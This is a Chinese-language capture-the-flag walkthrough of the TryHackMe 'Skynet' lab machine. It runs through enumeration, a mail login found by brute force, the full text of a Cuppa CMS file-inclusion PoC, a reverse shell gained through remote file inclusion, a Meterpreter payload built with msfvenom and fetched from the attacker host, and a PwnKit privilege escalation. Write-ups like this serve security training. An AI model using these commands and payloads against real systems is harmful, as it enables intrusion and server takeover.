目录
连接至THM服务器并启动靶机
信息收集
使用rustscan对靶机TCP端口进行开放扫描
使用nmap对靶机TCP开放端口进行脚本、服务扫描
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
使用nmap对靶机常用UDP端口进行开放扫描
使用nmap对137端口进行针对性扫描
使用enum4linux对靶机SMB服务进行用户、共享枚举
使用smbclient连接至靶机anonumous共享
使用curl访问靶机80端口
使用ffuf对靶机80端口Web进行路径FUZZ
使用浏览器访问/squirrelmail接口
使用BurpSuite尝试对milesdyson用户进行撞库
使用上述凭证成功登入该用户网页后台面板
边界突破
使用enum4linux通过milesdyson用户SMB服务凭证对SMB共享再次枚举
使用smbclient通过milesdyson用户凭证连接到靶机milesdyson共享
使用浏览器访问/45kra24zxs28v3yd接口
使用ffuf对该接口进行路径FUZZ
使用浏览器访问/45kra24zxs28v3yd/administrator/接口
使用searchsploit搜索该WebAPP
查看该PoC内容
使用curl仿照PoC构造URL进行发包
对Kali自带的php-reverse-shell.php反弹Shell脚本中监听IP与监听端口变量进行修改
使用curl构造URL对本地反弹Shell脚本进行访问
本地侧nc收到反弹Shell回显
特权提升
控制靶机将本地linpeas.sh自动化提权信息扫描脚本进行下载
赋执行权限并运行该脚本
找到Executing Linux Exploit Suggester一栏
查看靶机系统位数
使用msfvenom生成64位的Meterpreter木马
启动Metasplolit
切换到监听模块
查看该模块需要补充的选项
控制靶机将本地shell.elf二进制后门文件进行下载
本地侧MSF收到回显
切换到自动化提权扫描模块
查看该模块需要补充的选项
使用自动提权扫描模块中建议的EXP模块尝试提权
查看该模块需要补充的选项
使用Meterpreter的search功能查找root.txt文件
连接至THM服务器并启动靶机
靶机IP:10.10.118.152
分配IP:10.11.120.102
信息收集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.118.152 -r 1-65535 --ulimit 5000
使用nmap对靶机TCP开放端口进行脚本、服务扫描
nmap -p22,80,110,139,143,445 -sCV 10.10.118.152
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -p22,80,110,139,143,445 --script=vuln -O 10.10.118.152
使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.118.152
使用nmap对137端口进行针对性扫描
nmap -sU -p 137 -sCV --script=vuln 10.10.118.152
使用enum4linux对靶机SMB服务进行用户、共享枚举
enum4linux -U -S 10.10.118.152
使用smbclient连接至靶机anonumous共享
smbclient -L \\\\10.10.118.152\\anonumous
- 通过浏览该共享,将attention.txt、log1.txt文件下载到本地
- 查看这两个文件的内容
cat attention.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
cat log1.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
- 该log1.txt文件看起来像密码列表,因为其中并未出现milesdyson用户名
使用curl访问靶机80端口
curl -I http://10.10.118.152:80
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.118.152:80
HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 12:34:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Tue, 17 Sep 2019 08:58:28 GMT
ETag: "20b-592bbec81c0b6"
Accept-Ranges: bytes
Content-Length: 523
Vary: Accept-Encoding
Content-Type: text/html
使用ffuf对靶机80端口Web进行路径FUZZ
ffuf -u http://10.10.118.152:80/FUZZ -w ../dictionary/Common-dir.txt
使用浏览器访问/squirrelmail接口
使用BurpSuite尝试对milesdyson用户进行撞库
- 对响应码进行排序找到302响应
账户:milesdyson
密码:cyborg007haloterminator
使用上述凭证成功登入该用户网页后台面板
- 点击主题为Samba Password reset的邮件获取该用户SMB服务登录密码
账户:milesdyson
密码:)s{A&2Z=F^n_E.B`
边界突破
使用enum4linux通过milesdyson用户SMB服务凭证对SMB共享再次枚举
enum4linux -u 'milesdyson' -p ')s{A&2Z=F^n_E.B`' -S 10.10.118.152
使用smbclient通过milesdyson用户凭证连接到靶机milesdyson共享
smbclient -N \\\\10.10.118.152\\milesdyson -U 'WORKGROUP/milesdyson%)s{A&2Z=F^n_E.B`'
- 在\notes目录下找到important.txt文件,将其下载到本地
- 查看important.txt文件内容
cat important.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat important.txt1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
- 根究该文件第一条提示,可知存在接口:/45kra24zxs28v3yd
使用浏览器访问/45kra24zxs28v3yd接口
使用ffuf对该接口进行路径FUZZ
ffuf -u http://10.10.118.152/45kra24zxs28v3yd/FUZZ -w ../dictionary/Common-dir.txt
使用浏览器访问/45kra24zxs28v3yd/administrator/接口
- 由网页展示可知,该接口使用的WebAPP为Cuppa CMS
使用searchsploit搜索该WebAPP
searchsploit cuppa
- 将该PoC拷贝到当前目录下
searchsploit -m 25971.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 25971.txt
Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
URL: https://www.exploit-db.com/exploits/25971
Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
Codes: OSVDB-94101
Verified: True
File Type: C++ source, ASCII text, with very long lines (876)
Copied to: /home/kali/Desktop/temp/25971.txt
- 由searchsploit输出可见,该漏洞编号为OSVDB-94101
查看该PoC内容
cat 25971.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat 25971.txt
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux,--^----------,--------,-----,-------^--,| ||||||||| `--------' | O .. CWH Underground Hacking Team ..`+---------------------------^----------|`\_,-------, _________________________|/ XXXXXX /`| // XXXXXX / `\ // XXXXXX /\______(/ XXXXXX // XXXXXX /(________(`------'####################################
VULNERABILITY: PHP CODE INJECTION
####################################/alerts/alertConfigField.php (LINE: 22)-----------------------------------------------------------------------------
LINE 22:<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------#####################################################
DESCRIPTION
#####################################################An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]#####################################################
EXPLOIT
#####################################################http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwdMoreover, We could access Configuration.php source code via PHPStreamFor Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------Base64 Decode Output:
-----------------------------------------------------------------------------
<?phpclass Configuration{public $host = "localhost";public $db = "cuppa";public $user = "root";public $password = "Db@dmin";public $table_prefix = "cu_";public $administrator_template = "default";public $list_limit = 25;public $token = "OBqIPqlFWf3X";public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";public $upload_default_path = "media/uploadsFiles";public $maximum_file_size = "5242880";public $secure_login = 0;public $secure_login_value = "";public $secure_login_redirect = "";}
?>
-----------------------------------------------------------------------------Able to read sensitive information via File Inclusion (PHP Stream)################################################################################################################Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
使用curl仿照PoC构造URL进行发包
curl -v http://10.10.118.152/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
- 对响应中的BASE64数据进行解码
echo 'PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gInBhc3N3b3JkMTIzIjsKCQlwdWJsaWMgJHRhYmxlX3ByZWZpeCA9ICJjdV8iOwoJCXB1YmxpYyAkYWRtaW5pc3RyYXRvcl90ZW1wbGF0ZSA9ICJkZWZhdWx0IjsKCQlwdWJsaWMgJGxpc3RfbGltaXQgPSAyNTsKCQlwdWJsaWMgJHRva2VuID0gIk9CcUlQcWxGV2YzWCI7CgkJcHVibGljICRhbGxvd2VkX2V4dGVuc2lvbnMgPSAiKi5ibXA7ICouY3N2OyAqLmRvYzsgKi5naWY7ICouaWNvOyAqLmpwZzsgKi5qcGVnOyAqLm9kZzsgKi5vZHA7ICoub2RzOyAqLm9kdDsgKi5wZGY7ICoucG5nOyAqLnBwdDsgKi5zd2Y7ICoudHh0OyAqLnhjZjsgKi54bHM7ICouZG9jeDsgKi54bHN4IjsKCQlwdWJsaWMgJHVwbG9hZF9kZWZhdWx0X3BhdGggPSAibWVkaWEvdXBsb2Fkc0ZpbGVzIjsKCQlwdWJsaWMgJG1heGltdW1fZmlsZV9zaXplID0gIjUyNDI4ODAiOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luID0gMDsKCQlwdWJsaWMgJHNlY3VyZV9sb2dpbl92YWx1ZSA9ICIiOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3JlZGlyZWN0ID0gIiI7Cgl9IAo/Pg==' | base64 -d
数据库:cuppa
账户:root
密码:password123
- 由于靶机并未将数据暴露在外网中,所以这里尝试通过远程文件包含Getshell
对Kali自带的php-reverse-shell.php反弹Shell脚本中监听IP与监听端口变量进行修改
- 本地开启一个HTTP服务以便靶机访问该反弹Shell脚本
python -m http.server 8888
#此处切记不可使用`php -S 0:PORT`开启HTTP服务,否则会反弹本地Shell
- 本地使用nc开始监听反弹Shell脚本中设定的端口
rlwrap -cAr nc -lvnp 1425
使用curl构造URL对本地反弹Shell脚本进行访问
curl http://10.10.118.152/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.11.120.102:8888/php-reverse-shell.php
- 由python开启的HTTP服务器收到访问请求
┌──(root㉿kali)-[/home/kali/Desktop/WebShell]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.10.118.152 - - [22/Dec/2024 09:21:36] "GET /php-reverse-shell.php HTTP/1.0" 200 -
本地侧nc收到反弹Shell回显
- 提升TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'
- 在/home/milesdyson目录下找到user.txt文件
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@skynet:/home/milesdyson$ ls
ls
backups mail share user.txt
特权提升
控制靶机将本地linpeas.sh自动化提权信息扫描脚本进行下载
curl -O http://10.11.120.102/linpeas.sh
www-data@skynet:/var/www/html/admin$ cd /tmp
cd /tmp
www-data@skynet:/tmp$ ls
ls
systemd-private-e3aa1feddce44ffaa493ef65dc8f48f9-dovecot.service-UAus7R
systemd-private-e3aa1feddce44ffaa493ef65dc8f48f9-systemd-timesyncd.service-YRuskz
www-data@skynet:/tmp$ curl -O http://10.11.120.102/linpeas.sh
curl -O http://10.11.120.102/linpeas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 805k 100 805k 0 0 389k 0 0:00:02 0:00:02 --:--:-- 389k
www-data@skynet:/tmp$ ls
ls
linpeas.sh
systemd-private-e3aa1feddce44ffaa493ef65dc8f48f9-dovecot.service-UAus7R
systemd-private-e3aa1feddce44ffaa493ef65dc8f48f9-systemd-timesyncd.service-YRuskz
赋执行权限并运行该脚本
www-data@skynet:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@skynet:/tmp$ ./linpeas.sh
./linpeas.sh
找到Executing Linux Exploit Suggester一栏
- 发现可能存在的CVE漏洞太多了,一个个手测太慢这里直接用MSF
查看靶机系统位数
uname -a
www-data@skynet:/tmp$ uname -a
uname -a
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
使用msfvenom生成64位的Meterpreter木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.11.120.102 LPORT=1426 -f elf > shell.elf
启动Metasplolit
msfconsole
切换到监听模块
use exploit/multi/handler
查看该模块需要补充的选项
show options
- 该模块需要补充选项:LHOST、LPORT、PAYLOAD
msf6 exploit(multi/handler) > set LHOST 10.11.120.102
LHOST => 10.11.120.102
msf6 exploit(multi/handler) > set LPORT 1426
LPORT => 1426
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
控制靶机将本地shell.elf二进制后门文件进行下载
curl -O http://10.11.120.102/shell.elf
- 在靶机中为shell.elf赋执行权限
chmod +x shell.elf
- 直接在靶机中运行该二进制文件
./shell.elf
本地侧MSF收到回显
- 将该Meterpreter终端收入会话
background
meterpreter > background
[*] Backgrounding session 2...
切换到自动化提权扫描模块
use post/multi/recon/local_exploit_suggester
查看该模块需要补充的选项
show options
- 该模块需要补充选项:SESSION
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run
- 由于网络不稳定,该模块扫一部分后被迫暂停
使用自动提权扫描模块中建议的EXP模块尝试提权
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
查看该模块需要补充的选项
show options
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 10.11.120.102
LHOST => 10.11.120.102
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 1427
LPORT => 1427
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 2
SESSION => 2
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit
- 成功提权到ROOT用户
使用Meterpreter的search功能查找root.txt文件
search -f root.txt
meterpreter > search -f root.txt
Found 1 result...
=================Path Size (bytes) Modified (UTC)
---- ------------ --------------
/root/root.txt 33 2019-09-17 23:41:47 -0400